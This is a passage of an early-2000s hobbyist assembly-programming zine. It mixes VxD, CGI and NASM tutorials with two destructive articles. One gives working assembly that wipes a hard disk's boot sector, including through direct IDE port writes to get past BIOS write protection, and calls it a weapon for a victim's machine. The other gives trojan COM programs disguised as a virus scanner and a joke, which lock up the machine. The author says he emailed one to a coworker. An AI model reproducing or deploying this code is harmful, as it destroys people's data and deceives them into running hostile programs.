::/ \::::::. :/___\:::::::. /| \::::::::. :| _/\:::::::::. :| _|\ \::::::::::. Sep 00-Aug 01 :::\_____\::::::::::. Issue 9 ::::::::::::::::::::::......................................................... A S S E M B L Y P R O G R A M M I N G J O U R N A L http://asmjournal.freeservers.com asmjournal@mailcity.com T A B L E O F C O N T E N T S ---------------------------------------------------------------------- Introduction.............................................Tiago.Sanches "Programming in extreme conditions".......................Kalmykov.b52 "Pestcontrols"...........................................Jan.Verhoeven Column: Win32 Assembly Programming "How to write VxDs using NASM".............................therain "Common Gateway Interface using PE console apps"....Michael.Pruitt Column: The Unix World "Writing A Useful Program With NASM".................Jonathan.Leto "Command Line in FreeBSD".........................G.Adam.Stanislav "Compressing data"...................................Feryno.Gabris Column: PalmOS Environment "Hello Tiny World"..........................................Latigo Column: Gaming Corner "Win32 ASM Game Programming - Part 2"..................Chris.Hobbs Column: Assembly Language Snippets "Basic trigonometry functions"....................Eoin.O'Callaghan "getpass"................................................Jake.Bush "strcmp".................................................Jake.Bush "strlwr".................................................Jake.Bush "strupr".................................................Jake.Bush Column: Issue Solution "Exact Pattern Matching Algorithms"...............Steve.Hutchesson "Binary String Search Algorithm".........................buliaNaza ---------------------------------------------------------------------- +++++++++++++++++++Issue Challenge++++++++++++++++++ Code a fast pattern matching algorithm ---------------------------------------------------------------------- ::/ \::::::. :/___\:::::::. /| \::::::::. :| _/\:::::::::. :| _|\ \::::::::::. :::\_____\:::::::::::..............................................INTRODUCTION by Tiago Sanches Finally, issue 9 is out! After a long, long time APJ is back. What happened? Well, mainly due to mammon_'s lack of free time to handle everything concerning the journal by himself and whatnot (which may have led to a shortage of contributions), APJ had to be discontinued as of last year. The good news are that the journal is back, many people have volunteered to help out and so in the future a staff may actually be a reality, allowing things to run smoother than they have. On a side note, mammon_ is still administrating the journal, even if time constraints don't allow him to get as involved in its management as before. Anyway, about this issue, there are articles ranging from CGI programming, written by Michael Pruitt, to the continuation of Chris Hobbs' gaming series (that Chili prepared for ASCII distribution). A new column has also been created, concerning the emerging PalmOS platform, featuring a very good introductory article by Latigo. G. Adam Stanislav contributed another article for the Unix side, along with Feryno Gabris, who presents an ELF compressor, whose text may look somewhat cryptic at first if not for the source code provided, both NASM oriented. Also for NASM, therain shows how to write VxDs and Jonathan Leto provided an article for the beginning assembly programmer. To close the list is a "back to the stone age" low-level programming article by Kalmykov.b52 for when everything you have is MS-DOS and, lastly, it's Jan Verhoeven's payback day as he says: "This time the joke is on you!". All in all this issue is packed with very good articles, not mentioning the great trigonometry macros by Eoin O'Callaghan in the snippets section, as well as some other pieces of code from Jake Bush and at the end the issue challenge that this time focuses on pattern matching algorithms, featuring a great work done by Steve Hutchesson along with code presented by buliaNaza. Just a reminder for contributers on submission guidelines: articles must be written in English and may focus on any aspect of assembly language for any level of programming, but remember that they must be in ASCII text format. Here are some rules to follow: - lines should have a maximum of 80 characters (including the 'New Line' character), with no left or right margins. - article subsections should consist of a subsection name, a following line of hyphens to underscore and be preceded by two carriage returns. - Paragraphs should not be indented and must be seperated by a blank line. - Code indentation (opcodes) should be about 8 chars. - Don't use TABs, use spaces instead! That said, remember to supply a name or handle and a title for the article and check the contents of the current issue for a general idea of the magazine's format. You can mail the articles, snippets or any other contribution to me at: sanches@host.sk Hopefully, with your help, issue 10 will be out faster than this one and the journal can start being released on a regular basis again. As mammon_ would say, enjoy the mag! Tiago Sanches ::/ \::::::. :/___\:::::::. /| \::::::::. :| _/\:::::::::. :| _|\ \::::::::::. :::\_____\:::::::::::...........................................FEATURE.ARTICLE Programming in extreme conditions by Kalmykov.b52 INTRODUCTION ------------ What is 'extreme conditions' ? When you are sitting in front of a computer with only MS-DOS installed without any compilers, hex editors, shells, debuggers and you need to recover lost data, delete virus, or write a new one. This is an extreme conditions. Most of programmers won't be able to do anything, most of administrators think that this computer is 100% secured. But this won't stop the assembler programmer ... I have chosen pure MS-DOS as the operation system to program for because in Windows there are many things that will easier this task (e.g. in Windows 98 there is-built in browser with VBScript and Java Script interpretators so you can easy write a hex-editor and more). This article will be interesting as for the beginners and experienced programmers. Also I recommend it to hackers, administrators, and anybody who wants to feel the spirit of low-level programming, which now is disappearing with the previous programmers generation generation. THE BEGINNING ------------- To read and understand this you will need this minimum: the knowledge of Assembler, experience working with MS-DOS. Also you will need the list of x86 instructions opcodes, ASCII table, and lot of free time. First of all, we need some kind of text editor. But the administrator removed EVERYTHING that could help us. There is only one thing that differs a good programmer from any other- It's the deep knowledge of everything he works with. If works with DOS he knows everything about it. There is undocumented functions that opens a tiny text editor, but that's enough. Enter this DOS command: C:\copy con test.com You will run the text editor. This is our instrument. But we still don't know how to write binaries. If you will look to official MS-DOS manual, you'll find the answer. Using ALT key and the numeric keyboard you can create binaries. First of all check if the NUMlock is on. Now press ALT, type 195, now release ALT. To save file and exit press CTRL-Z and hit enter. Now run it. It doesn't do anything but it doesn't halt the system. If you disassemble it you will find that test.com consists of only one operand RETN. As you already guessed opcode of RETN (195 == 0xC3), and in decimal it is 195. ADVANCED -------- Well, It was easy. Now try to enter this: ALT-180 ALT-09 ALT-186 ALT-09 ALT-01 ALT-205 ! ALT-195 ALT 32 Hi,world!$ Than press CTRL-Z and hit enter. It is clear that this program that prints "Hi,world!". Let's disassemble it: 49E0:0100 start: 49E0:0100 B4 09 mov ah,9 49E0:0102 BA 0109 mov dx,offset data_1 49E0:0105 CD 21 int 21h ; DOS Services ; ah=function 09h ; display char ; string at ds:dx 49E0:0107 C3 retn 49E0:0108 20 db 20h 49E0:0109 48 69 20 21 21 21 data_1 db 'Hi,world!$ ; xref 49E0:0102 I hope you know about the reversed order in machine word (ALT-09 ALT-01 = 109). Also, in order to show the beauty of this method, I used symbol '!' == 0x21 to call interrupt 0x21. So knowing ASCII codes can easier your life. But why we need this symbol (20h == ALT-32 == " ") at 49E0:0108 ? This is the main problem of this method. Using ALT and numeric keyboard we cannot enter some symbols. Here is a list of them: 0,3,6,8,16(0x10),19(0x13),27(0x1b),255(0xFF) You will need to avoid this symbols. If you look at the code, you'll see that the real offset is 0x108. After adding a symbol the offset became 0x109. Actually there is more elegant way to do it: mov dx,109 dec sx These two variants are equal (dec dx == 1 byte) and you chose what suits you best. Another problem is finding offset of variables and labels. You can write program on the paper, giving to variables symbolic names, and then the program will be ready it will be easy to find necessary offsets and address. Another possibility is declaring all variables before their usage: mov ah,9 jmp sort $+20 db 'Hi,world!'$ mov dx,0x100+2+2; 0x100 - the base adress,2 - lengh of ; mov ah,9, 2 - lengh of jmp jmp short $+20 - reserves 20 bytes for the string. This method could be also used for labels. THE EXAMPLE ----------- I think you are tired of these theoretical programming and feel ready to see this method in work. As illustration we will to create a program that erases the boot sector. Attention ! The usage of this program in order to destroy information is a crime. You should use it only for experimental purpose. First of all, let's write it on assembler: B80103 mov ax,00301 B90100 mov cx,00001 BA8000 mov dx,00080 CD13 int 013 C3 retn As you see we have one #0 and two #3. Let's modify the program to avoid them: xor ax,ax mov ds,ax mov ax,00299 inc ax inc ax xor cx,cx inc cx mov dl,80 mov bx,13h*4 pushf cli push cs call dword ptr [bx] retn Maybe it's quite a hard example. The assembler programming and interrupts are not really the subject of this article. I can only forward you to the other references that you can easily find on the Internet. Fortunately (or unfortunately, depends on readers orientation), in BIOS there is a boot write protection (sometimes it's called "Virus warning").It will block any efforts to modify the main boot sector. For example, running this program under Windows 98 operation system will take no effect. But we still can work with hard drive I/O ports on a low-level. Here is an example of program that will erase main boot sector, through hard drive I/O ports: mov dx, 1F2h mov al,1 out dx,al inc dx out dx,al inc dx xor ax,ax out dx,al inc dx out dx,al mov al, 10100000b inc dx out dx,al inc dx mov al,30h out dx,al lea si, Buffer mov dx, 1F0h mov cx, 513 rep outsw I don't know any popular protection that can track and block that program. However, that doesn't refer to Windows NT, this OS won't allow any program without necessary privileges to work with ports, even more it will close the application's window. Preparing this example for entering it using ALT and optimizing It's size I will leave as an exercise to the readers.That's all: enter this in victims machine and you have powerful weapon. I recommend to use it very carefully. ENDING ------ It's not easy. All this requires a lot of experience and talent but gives you incredible power on machine(and i hope you won't be using this power for destruction). All this looks quite unuseful, you can say that you won't need it - but who knows?.. Nowdays programmer depends on the powerfull development tools (compilers, debuggers, editors) and when he stay alone with 'nature' he cannot control the situation anymore - he cannot control the machine ... ::/ \::::::. :/___\:::::::. /| \::::::::. :| _/\:::::::::. :| _|\ \::::::::::. :::\_____\:::::::::::...........................................FEATURE.ARTICLE Pestcontrols by Jan Verhoeven Are you plagued now and then by friends and relatives who send you funny pictures (mostly with a lot of "beneath the belt content") via E-mail? I used to have them. I got rid of these pests. How I did it? I sent back some nice programs. And if they run Outlook Express, they can't resist to open the attachment. What I do is NOT make a virus. It is at best a trojan horse, but in fact it doesn't even come close to a trojan. No harm is done (intentionaly) unless the victim is a real moron and starts an unknown executable. Pestcontrol 1: the virus scanner -------------------------------- Most of the afore mentioned morons know of the exsitence of virus scanners. So they will be more than eager to try out the latest one, especially if it is as compact as this one: name scan lf equ 10 cr equ 13 mov dx, offset text mov ah, 9 int 021 ; show some message back: cli ; disable keyboard etc jmp back ; and do it again mov ax, 04C00 ; by the time pigs can fly, ... int 021 ; ... the program is halted. text db 'Scanning your system....', cr, lf db 'Please wait a minute. $' db 1023 dup (073) Yes, you are right, this COM file is something like 1 Kb in size. You can easily control the size by adjusting the value in the last line. Make sure to remain well under the 64K limit else the file cannot be a COM file anymore and there is a chance that a wraparound will occur in which you main routine will be overwritten. I hesitate to explain the program. It's so damned simple. In part 1 the message is printed to the screen. In part 2 the computer is crippled and in part 3 the program returns to the command interpreter, only this point is never reached.... :o) Believe me: people will wait HOURS before they get worried and try to Alt-Ctrl-Del themselves a way out of this problem. Only to find out that their efforts are in vain. If this program is run from within a DOS box under WIndows, and the user had a lot of other tasks open, he will loose any unsaved work. And if he or she is on a network, it may be crippled as well. So be a little bit careful who you treat to this attachment..... Pestcontrol 2: something funny ------------------------------ We all like jokes, don't we? So we send eachother large breasted foto's and such. I have a joke to send back to these persons. It's a real funny program, believe me. And efficient. name funny cli ; disable keyboard and interrupts cld ; make sure we move upwards mov ax, 0A000 ; point to start of VGA pixel RAM mov es, ax mov ds, ax L1: cli ; INT's off again, just in case... mov cx, 08000 mov ax, 0 mov di, ax mov si, ax L0: cli ; did I turn of INT's? lodsw ; fetch word from VGA screen xor ax, ax ; clear it stosw ; and store it loop L0 ; loop back to CLI instruction cli ; and turn off interrupts jmp L1 ; before jumping back to the CLI. db 22K dup ('� ') ; add some more muscles. This is a real nasty program. One of the guys at work (two windows away from my place; I could see the results...) had been sending me several 500 Kb funnies. I asked him to remove me from his mailing but he didn't listen. So I shot back (hey, it was self defence!). The first part of the program kills the keyboard and other interrupts, whereas the second part plays a nasty trick on the user screen. I assume the user is running Windows on a VGA screen.... It keeps on pumping ZERO's into display memory in a loop that's almost impossible to stop. If the CPU would manage to enable interrupts again it will loose control after another few nanoseconds (on modern CPU's) or microseconds (on older ones). The result is devastating: they run the FUNNY.EXE (if there is no MZ in the exe-header, the program is considered a COM file) and the screen turns black immediately and they loose all control of the machine. The three fingered salute will not help. The only option is to pull the plug. This executable did the trick. Four requests to relieve me from his mail assaults did not work. One counterattack with my Funny Exe was effective immediately. Afterthoughts ------------- Yes, these programs are nasties. They should NOT be copied or used too soon. On the other hand, Windows is so clumsily programmed (there should be IO Privileges on task switching instructions like IN, OUT and CLI but there aren't) that it enables malicious software to cause the effects they do. Reminder -------- The code published here is GNU GPL. Don't try this at home. ::/ \::::::. :/___\:::::::. /| \::::::::. :| _/\:::::::::. :| _|\ \::::::::::. :::\_____\:::::::::::................................WIN32.ASSEMBLY.PROGRAMMING How to write VxDs using NASM by therain I. About the readers and article's files overview II. MASM vs NASM : Syntax overview III. A skeleton VxD IV. More VxD examples V. FAQs VI. About the writer I. About the readers and article's files overview ------------------------------------------------- This article is aimed at the user that already does little Virtual Device Driver (VxD) progamming using Microsoft's Macro Assembler (MASM). It will only cover how to use the Net Wide Assembler (NASM) to write Virtual Device Drivers and not how to learn VxD programming using NASM. It is also suggested that the user be familiar with NASM or read NASM DOC. As for the files in this article: NASMVXD.TXT - This article. VXDN.INC - Contains VxD related definitions and macros for NASM. WINDDK.INC - This is used by VXDN.INC and should'nt be directly included by you. It contains VxD related EQU's and it also has VxD services covering VMM,Shell,Debug,... II. Overview about MASM & NASM ------------------------------ It is time to mention that NASM was never intended to produce VxD files and you won't be able to produce any without the include files from this package and without Microsoft's Incremental Linker (LINK.EXE). Okay, now the syntax differences between MASM & NASM. Processor Mode: --------------- To enable the use of 386+ protected mode instructions you used to put a '.386p' in MASM, no need for that in NASM, however you have to explicitly set the default bitness to 32 via the 'BITS 32' directive (and to 16 in the real mode initialization segment). MASM: .386p NASM: BITS 32 Segments specification: ----------------------- MASM has lot of segments declaration macros unlike NASM in which you have to name the segment as you stated it in the .DEF file. The 5 basic segment definition macros are: MASM: NASM: Description ----- ----- ----------- VxD_CODE_SEG/ENDS segment _LTEXT Protected mode code seg. VxD_DATA_SEG/ENDS segment _LDATA Protected mode data seg. VxD_ICODE_SEG/ENDS segment _ITEXT Protected mode initialization code segment. (usually optional) VxD_IDATA_SEG/ENDS segment _IDATA Protected mode initialization data segment. (usually optional) VxD_REAL_INIT_SEG/ENDS segment _RTEXT Real mode initialization segment. (optional too) Notice that NASM does not need a segment closing macro unlike MASM. To start a new segment just declare it like 'segment _LTEXT' and everything after that line will go to that segment. Please do not use the intrinsic form of the segment macro (e.g. [segment _LTEXT]) as certain VxD macros rely on saving/restoring the current segment and they would fail should you use the intrinsic form. Check the FAQ for a brief segment overview or NASMDOC.TXT for full overview. Virtual Device Desciptor Block (DDB) Declaration: ------------------------------------------------- MASM: ----- Declare_Virtual_Device Name, MajorVer, MinorVer, CtrlProc, DeviceNum, InitOrder, V86Proc, PMProc, RefData NASM: ----- Due to the fact that NASM does not support string concatenation in macros yet (there exist patched versions which do), the declaration is a bit different: Declare_Virtual_Device Name, 'Name', MajorVer, MinorVer, CtrlProc, DeviceNum, InitOrder, V86Proc, PMProc, RefData Params 5 to 9 are optional, since most of the time they are generic (not used). The extra parameter is 'Name' which will become the DDB_Name field in the DDB (this is the name by which the VxD will be known to the VMM), Name itself determines the name for the Control Procedure and the Service Table (if used). The DDB must be declared inside the _LDATA segment. Example: segment _LDATA Declare_Virtual_Device SAMPVXD1, 'SAMPVXD1', 1, 0, SAMPVXD1_Control Control Procedure Definition: ----------------------------- MASM: ----- Begin_Control_Dispatch NAME Control_Dispatch Message,Proc End_Control_Dispatch NASM: ----- This will be a little new for you since you have to do it by hand and not by similar macros: segment _LTEXT VXDNAME_Control: cmp eax,VM_INIT je OnVmInit cmp eax,W32_DEVICEIOCONTROL je OnDIOC cmp eax, je clc ; At any time during initialization, a virtual device can set the ; carry flag and return to the VMM to prevent the virtual device ; from loading. This means that the carry flag must be cleared to ; allow loading. retn OnVmInit: ; Do some code ret OnDIOC: ; OnDeviceIoControl ; ESI points to a DIOCParams struct cmp word [esi+DIOCParams.dwIoControlCode],MY_DIOC_CODE je domycode retn ; Don't forget to put a return as you're used to put a ; "EndProc procname" Any Other procedure Definition ------------------------------ Using NASM's normal procedure definition you can define a new proc as usual: "procname :". As for calling conventions you have to access the stack yourself or use some other NASM macros. Using VxdCall and VMMCall ------------------------- In NASM you can call: VMMCall Service,param1,{param2},[ [{]param3[}] ],.... III. A skeleton VxD -------------------- A skeleton VxD will be a very basic VxD enough to be loaded correctly and do nothing more than taking up memory. =) In NVXDSKEL.DEF you can specify if it will be a DYNAMIC or a STATIC VxD like: VXD MYVXD DYNAMIC ; dynamic vxd VXD MYVXD ; static vxd NVXDSKEL.DEF ------------ VXD NVXDSKEL DYNAMIC SEGMENTS _LTEXT CLASS 'LCODE' PRELOAD NONDISCARDABLE _LDATA CLASS 'LCODE' PRELOAD NONDISCARDABLE _TEXT CLASS 'LCODE' PRELOAD NONDISCARDABLE _DATA CLASS 'LCODE' PRELOAD NONDISCARDABLE CONST CLASS 'LCODE' PRELOAD NONDISCARDABLE _ITEXT CLASS 'ICODE' DISCARDABLE _IDATA CLASS 'ICODE' DISCARDABLE _PTEXT CLASS 'PCODE' NONDISCARDABLE _PDATA CLASS 'PDATA' NONDISCARDABLE SHARED _STEXT CLASS 'SCODE' RESIDENT _SDATA CLASS 'SCODE' RESIDENT _DBOSTART CLASS 'DBOCODE' PRELOAD NONDISCARDABLE CONFORMING _DBOCODE CLASS 'DBOCODE' PRELOAD NONDISCARDABLE CONFORMING _DBODATA CLASS 'DBOCODE' PRELOAD NONDISCARDABLE CONFORMING _RCODE CLASS 'RCODE' EXPORTS NVXDSKEL_DDB @1 NVXDSKEL.ASM ------------ bits 32 %include "vxdn.inc" segment _LDATA Declare_Virtual_Device NVXDSKEL,'NVXDSKEL',1,0,NVXDSKEL_Control segment _LTEXT NVXDSKEL_Control: clc retn Assembling and linking: ----------------------- * To assemble you must have NASM v0.98+ NASM NVXDSKEL.ASM -f win32 LINK NVXDSKEL.OBJ /VXD /DEF:NVXDSKEL.DEF That's it! IV. More VxD examples --------------------- This example will show the use of VMMCall and VxDCall VXDSAMP1.DEF ------------ VXD VXDSAMP1 DYNAMIC SEGMENTS _LTEXT CLASS 'LCODE' PRELOAD NONDISCARDABLE _LDATA CLASS 'LCODE' PRELOAD NONDISCARDABLE _TEXT CLASS 'LCODE' PRELOAD NONDISCARDABLE _DATA CLASS 'LCODE' PRELOAD NONDISCARDABLE CONST CLASS 'LCODE' PRELOAD NONDISCARDABLE _ITEXT CLASS 'ICODE' DISCARDABLE _IDATA CLASS 'ICODE' DISCARDABLE _PTEXT CLASS 'PCODE' NONDISCARDABLE _PDATA CLASS 'PDATA' NONDISCARDABLE SHARED _STEXT CLASS 'SCODE' RESIDENT _SDATA CLASS 'SCODE' RESIDENT _DBOSTART CLASS 'DBOCODE' PRELOAD NONDISCARDABLE CONFORMING _DBOCODE CLASS 'DBOCODE' PRELOAD NONDISCARDABLE CONFORMING _DBODATA CLASS 'DBOCODE' PRELOAD NONDISCARDABLE CONFORMING _RCODE CLASS 'RCODE' EXPORTS VXDSAMP1_DDB @1 VXDSAMP1.ASM ------------ bits 32 %include "vxdn.inc" segment _LDATA Declare_Virtual_Device VXDSAMP1,'VXDSAMP1',1,0,VXDSAMP1_Control segment _LTEXT VXDSAMP1_Control: cmp eax,W32_DEVICEIOCONTROL je OnDIOC clc retn OnDIOC: cmp dword [esi+DIOCParams.dwIoControlCode],1 je .1 xor eax,eax jmp .ret .1: VMMCall Get_Sys_VM_Handle xor esi,esi ; no callback xor edx,edx ; no ref data for callback mov eax,0 mov ecx,Msg mov edi,Title VxDCall SHELL_Message .ret: retn segment _LDATA Msg db 'Hello world!',0 Title db 'Title!',0 And another example that calls Int21/Ah=02,dl=7 to beep. VXDSAMP2.ASM ------------ bits 32 %include "vxdn.inc" segment _LDATA Declare_Virtual_Device VXDSAMP2,'VXDSAMP2',1,0,VXDSAMP2_Control segment _LTEXT VXDSAMP2_Control: cmp eax,W32_DEVICEIOCONTROL je OnDIOC clc retn OnDIOC: cmp dword [esi+DIOCParams.dwIoControlCode],1 je .1 xor eax,eax jmp .ret .1: VxDCall Begin_Nest_V86_Exec mov word [ebp+CRS.EAX],0x0200 mov word [ebp+CRS.EDX],0x0007 mov eax,0x21 VxDCall Exec_Int VxDCall End_Nest_Exec .ret: retn Use .DEF like previous example but change name to the new VxD name. To test the last two examples, just open the VxD with CreateFileA() and then issue a DeviceIoControl() with code 1. V. FAQs ------- Q) Where can i get NASM and LINK from? A) As for NASM you can get it from: http://www.web-sites.co.uk/nasm/ As for LINK.EXE you can get it from the DDK or just download the MASM Pack from http://win32asm.cjb.net Q) How can i add new services and use them with NASM? A) You can start by defining: MyDevice_DeviceID equ 0x1234 ; must be word and then define a service table like: Begin_Service_Table MyDevice VMM_Service MyService0 ; 0x0000 ord VMM_Service MyService1 ; 0x0001 ord VMM_Service MyServiceN ; ord N End_Service_Table MyDevice VI. About the writers --------------------- Me as therain, would like to credit: fOSSiL & The Owl - For creating VXDN.INC and for showing how to write VxDs in NASM in the first place by demonstrating it in IceDump (visit: http://icedump.tsx.org). And for reviewing/editing this document. Iczelion - For his awesome win32asm resource site and for his good VxD tutorials. (visit: http://win32asm.cjb.net) UKC Team - For their support. [The VXDN.INC and WINDDK.INC files can be obtained from http://asmjournal.freeservers.com/files/nasmvxd.zip where they have been archived along with the text of the article.] ::/ \::::::. :/___\:::::::. /| \::::::::. :| _/\:::::::::. :| _|\ \::::::::::. :::\_____\:::::::::::................................WIN32.ASSEMBLY.PROGRAMMING Common Gateway Interface using PE console apps by Michael Pruitt CGI: Tutorial 01: Supplying Dynamic Data to a Web Client -------------------------------------------------------- In the early '90s the NCSA released HTTPd 1.0 (a web server), a new concept was included; CGI. This feature allowed web content to be dynamically generated on the server. Up-to-date reports of stocks, scores, and weather were possible with CGI. Other uses include message boards, guest books, or e-stores. Typically a CGI application will interface with a Mosaic type web browser; supplying HTML with the data. When the server recieves a request targeting a CGI program, it will lauch the application. Any data from the client will be piped to StdIn. The app's StdOut will then be sent back to the client. Tools Needed ------------ This tutorial is written for FAsm (http://omega.im.uj.edu.pl/~grysztar/). If you wish to assemble the program, you will need FAsm 1.13.4 (or later) or you can translate it to an assembler supporting 80x86 PE console. For any CGI testing access to a web server is a must. I recommend Apache 1.3.20 (http://httpd.apache.org/). For starting out, you can place your assembled executable into the \Apache\cgi-bin\ directory. For the server name use "localhost" (excluding the quotes). Knowledge of HTML (HyperText Markup Language) is usefull. The basics of HTML are easy to learn. CSS (Cascading Style Sheets) will prove invaluable if you use a lot of HTML. A list of books is provided at the end of this article. A Win32 platform. My system consist of Win 98 SE on a Celeron 433 w/ 128MB RAM. Win 95 - NT should work without issues. A Linux box running WINE shoud also work for those with a strong stomach. Win32 API --------- Since everything a CGI application does is non GUI, the kernal32.dll will suffice for most projects. Database intensive app's will link to other dll's to better implement designs. To access the Standard I/O, will need to use GetStdHandle. Under Win32, StdIO is not availiable under predefined handles. ReadFile and WriteFile is used to move data. ReadConsole and WriteConsole will not work; file redirection in not availiable. CGI Environment --------------- A CGI program is not required to read data, but it is required to send it. Client data is availiable on the StdIn. The length is in the CONTENT_LENGTH environment variable. Also, 255 bytes of the data is in the QUERY_STRING EnvVar. All out put must start with "Content-Type:" a space, the type, and two newlines (CrLf). Common types include: "text/plain", "text/html", or "image/gif". Example output: Content-Type: text/plain Hello World. Example of HTTP 1.1 header and body. If you don't write any data, the web server will report with the error: "Premature end of script headers". If you really don't want to supply data, you could just write: "Content-Type: text/plain" and two newlines. The Example Program ------------------- The program I've supplied writes HTML containing the current date and time. It demonstrates use of API's, HTML, data manipulation. ~~~~~~~~~~~~~~~~~~~|||-------------------[code]-------------------||| format PE console entry Start include '\Asm_Win32\Include\_Kernel.inc' include '\Asm_Win32\Include\macro\stdcall.inc' include '\Asm_Win32\Include\macro\import.inc' Cr = 0x0D Lf = 0x0A ;***---------------------------------------------------------------*** section '.code' code readable executable Start: pusha ;Save all of the Registers stdcall [GetStdHandle], STD_OUTPUT_HANDLE ;Retrive the actual handle mov [StdOut], eax cmp eax, INVALID_HANDLE_VALUE ;Error with handle jz Exit Get_Time: stdcall [GetSystemTime], Time ;Load SYSTEMTIME with UTC call Format_Time ;Convert Hex(bin) to ascii ; and Place into HTML Write: stdcall [WriteFile], [StdOut], HTML, HTML._size, HTML.Len, 0 ;Write the HTML to StdOut Exit: popa ;Restore all of the Registers stdcall [ExitProcess], 0 ;***-------------------------[Subroutine]--------------------------*** Format_Time: mov ax, [Time.wYear] ;16b Data mov edi, HTML.Date_S + 9 ;Ptr to LAST byte of dest call .ascii ;Convert and place into HTML mov ax, [Time.wDay] mov edi, HTML.Date_S + 4 call .ascii mov ax, [Time.wMonth] mov edi, HTML.Date_S + 1 call .ascii mov edi, HTML.Day_S ;Destination Ptr mov esi, Day.Wk ;Source Ptr (Array of Days) xor eax, eax mov ax, [Time.wDayOfWeek] ;0 <= eax < 7 add esi, eax ;esi =+ eax * 3 add esi, eax ; Indexes the Array add esi, eax mov ecx, 3 ;3B per Day String cld ;Copy Left to Right rep ; (esi++, edi++) movsb mov ax, [Time.wHour] cmp al, 13 ;Check for PM jl .wHour sub al, 12 ;Correct Hour mov [HTML.Time_S + 9], 'P' ; AM -> PM .wHour: mov edi, HTML.Time_S + 1 call .ascii mov ax, [Time.wMinute] mov edi, HTML.Time_S + 4 call .ascii mov ax, [Time.wSecond] mov edi, HTML.Time_S + 7 call .ascii ret ;***----------------------[Import Table / IAT]---------------------*** .ascii: std ;String OPs Right to Left cmp ax, 10 ;Single Digit? jl .onex10 and ah, ah ;Only Two Digits jz .twox16 mov bh, 10 ;Reduce 3x16 to 2x16 div bh ; so that AAM can be used or ah, 0x30 ;BCD -> ASCII mov [edi], ah dec edi .twox16: aam ; AH / 10 = AH r AL or al, 0x30 ;BCD -> ASCII stosb mov al, ah cmp ah, 9 jg .twox16 .onex10: or al, 0x30 stosb ;Copy Last/Only Digit to Mem ret ;***--------------------[Data used by this App]--------------------*** section '.data' data readable writeable StdIn dd 0 ;Standard I/O Handles StdOut dd 0 HTML: db 'Content-type: text/html', Cr, Lf, Cr, Lf db 'Hello World', Cr, Lf db '

Hello World

', Cr, Lf db '

', Cr, Lf db 'This HTML is dynamicly generated by a PE console Application writen in' db '80x86 Assembler

', Cr, Lf db '

It is: ' .Day_S db 'WkD ' .Date_S db ' 0/00/0000 ' .Time_S db ' 0:00:00 AM UTC

', Cr, Lf db '', Cr, Lf HTML._size = $ - HTML - 1 HTML.Len dd 0 ;Number of bytes actually wrote Time SYSTEMTIME Day.Wk db 'SunMonTueWedThuFriSat' ;***----------------------[Import Table / IAT]---------------------*** section '.idata' import data readable writeable library kernel, 'KERNEL32.DLL' kernel: import GetModuleHandle, 'GetModuleHandleA',\ GetCommandLine, 'GetCommandLineA',\ GetSystemTime, 'GetSystemTime',\ GetEnvVar, 'GetEnvironmentVariableA',\ GetStdHandle, 'GetStdHandle',\ CreateFile, 'CreateFileA',\ ReadFile, 'ReadFile',\ WriteFile, 'WriteFile',\ CloseHandle, 'CloseHandle',\ ExitProcess, 'ExitProcess' __________________|||-------------------[/code]-------------------||| How to Run ---------- You can run this example from the command line since it requires no client data. You can also pipe the data into an html doc and open with IE: Main > Text.html For the real CGI, place Main.exe into the cgi-bin directory, launch Apache, and type "localhost/cgi-bin/Main.exe" in the address box of IE. References ---------- SAMS Teach Yourself CGI in 24 Hours SAMS 2000 $24.99US Rafe Colburn ISBN: 0-672-31880-6 CGI by Example QUE 1996 $34.99US Robert Niles & Jeffry Dwight ISBN: 0-7897-0877-9 HTML in Plain English - 2nd Edition MIS Press 1998 $19.95US Sandra E. Eddy ISBN: 1-55828-587-3 Cascading Sytle Sheets - The Definitive Guide O'Reilly 2000 $34.95US Eric A. Meyer ISBN: 1-56592-622-6 Win32 Programming Reference (Win32 API Help file) Microsoft 1990-1995 Free http://win32asm.rxsp.com/files/win32api.zip Contact ------- eet_1024@hotmail.com ::/ \::::::. :/___\:::::::. /| \::::::::. :| _/\:::::::::. :| _|\ \::::::::::. :::\_____\:::::::::::............................................THE.UNIX.WORLD Writing A Useful Program With NASM by Jonathan Leto Intro ----- Much fun can be had with assembly programming, it gives you a much deeper understanding about the inner workings of your processor and kernel. This article is geared towards the beginning assembly programmer who can't seem to justify why he is doing something as masochistic as writing an entire program in assembly language. If you don't already know one or more other programming languages, you really have no business reading this. Many constructs will also be explained in terms of C. You should also be familiar with the command line options of NASM, no sense going over them again here. Getting Started --------------- So you want to write a program that actually DOES something. "Hello, world" isn't cutting it anymore. First, an overview of the various parts of an assembly program: (For terse documentation, the NASM manual is the place to go.) The .data section ----------------- This section is for defining constants, such as filenames or buffer sizes, this data does not change at runtime. The NASM documentation has a good description of how to use the db,dd,etc instructions that are used in this section. The .bss section ---------------- This section is where you declare your variables. They look something like this: filename: resb 255 ; REServe 255 Bytes number: resb 1 ; REServe 1 Byte bignum: resw 1 ; REServe 1 Word (1 Word = 2 Bytes) longnum: resd 1 ; REServe 1 Double Word pi: resq 1 ; REServe 1 double precision float morepi: rest 1 ; REServe 1 extended precision float The .text section ----------------- This is where the actual assembly code is written. The term "self modifying code" means a program which modifies this section while being executed. In The Beginning ... -------------------- The next thing you probably noticed while looking at the source to various assembly programs, there always seems to be "global _start" or something similar at the beginning of the .text section. This is the assembly program's way of telling the kernel where the program execution begins. It is exactly, to my knowledge, like the main function in C, other than that it is not a function, just a starting point. The Stack and Stuff ------------------- Also like in C, the kernel sets up the environment with all of the environment variables, and sets up **argv and argc. Just in case you forgot, **argv is an array of strings that are all of the arguments given to the program, and argc is the count of how many there are. These are all put on the stack. If you have taken Computer Science 101, or read any type of introductory computer science book, you should know what a stack is. It is a way of storing data so that the last thing you put in is the first that comes out. This is fine and dandy, but most people don't seem to grasp how this has anything to do with their computer. "The stack" as it is ominously referred too, is just your RAM. That's it. It is your RAM organized in such a way, so that when you "push" something onto "The stack", all you are doing is saving something in RAM. And when you "pop" something off of "The stack", you are retrieving the last thing you put in, which is on the top. Ok, now let's look at some code that you are likely to see. section .text ; declaring our .text segment global _start ; telling where program execution should start _start: ; this is where code starts getting exec'ed pop ebx ; get first thing off of stack and put into ebx dec ebx ; decrement the value of ebx by one pop ebp ; get next 2 things off stack and put into ebx pop ebp What does this code do? It simply puts the first actual argument into the ebx register. Let's say we ran the program on the command line as so: $ ./program 42 A When where are on the _start line, the stack looked something like this: ----------- | 3 | The number of arguments, including argv[0], | | which is the program name ----------- |"program"| argv[0] ----------- | "42" | argv[1] NOTE: This is the character "4" and "2", | | not the number 42 ----------- | "A" | argv[2] ----------- So, the first instruction, "pop ebx", took the 3, and put it into ebx. 